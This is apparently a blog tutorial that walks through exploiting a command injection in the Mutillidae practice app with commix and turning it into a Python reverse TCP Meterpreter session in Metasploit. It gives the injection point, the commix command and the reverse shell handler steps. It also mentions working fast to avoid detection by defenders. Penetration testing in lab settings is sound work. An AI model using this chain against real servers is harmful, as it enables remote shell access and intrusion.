Command Injection to Metasploit Meterpreter with Commix

Hi everyone,

I would like to write about a bit of review regarding command injection tools commix. I found this tools is really helping me at getting the job done faster.

As you know that during our OWASP penetration test exploiting a vulnerability untill we get the shell take sometimes. Taking too long on getting the access to the remote server shell will make your activities notified by the defender.

Commix is a tool that help you to test and exploit command injection. Using this tools help you shorten the time for exploiting and getting the access to shell. The most important feature of this tools is to enable you generate reverse tcp for metasploit where it open for much advanced framework.

I will guide you to use commix using the command injection vulnerabilities at mutillidae web testing.

Install commix

  1. Run you kali linux
  2. Open the console
  3. run git clone https://github.com/commixproject/commix.git
  4. go to commix directory

Exploit the web

  1. Chain your web browser to burpsuite.
  2. Go to command injection section in mutillidae http://192.168.5.130/mutillidae/index.php?page=dns-lookup.php
  3. Try analize the command injection point in burp
  4. 35-bb
  5. Based on the information above, the injection point would be at target_host=hostname&&INJECTION_POINT&dns-lookup-php-submit-button=Lookup+DNS
  6. We can start our commix to do the exploitation of this bug with the command commix.
    commix –url=”http://192.168.5.130/mutillidae/index.php?page=dns-lookup.php” –data=”target_host=detik.com&dns-lookup-php-submit-button=Lookup+DNS”
  7. 36-bb
  8. If you have reached that point then your os shell has been successfully built

 

Start metasploit

  1. After your shell is built you can activate metasploit by typing reverse_tcp
  2. set LHOST <type your kali linux IP>
  3. set LPORT <type your server port>
  4. type 2 for other reverse tcp shell
  5. type 9 for python reverse tcp shell
  6. it will generate metasploit meterpreter and wait for the metasploit handler file generated
  7. 37-bb
  8. Open another console and type the command generated by commix
  9. in my case the command is msfconsole -r /usr/share/commix/py_meterpreter.rc
  10. after the metasploit multi handler start, then press any key in commix to start the reverse tcp and meterpreter
  11. Yeah .. the metasploit meterpreter is initiated
  12. 38-bb

You can see above, the process of command injection to meterpreter deployment to get the metasploit up.

Hope this will help you all.. thanks

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s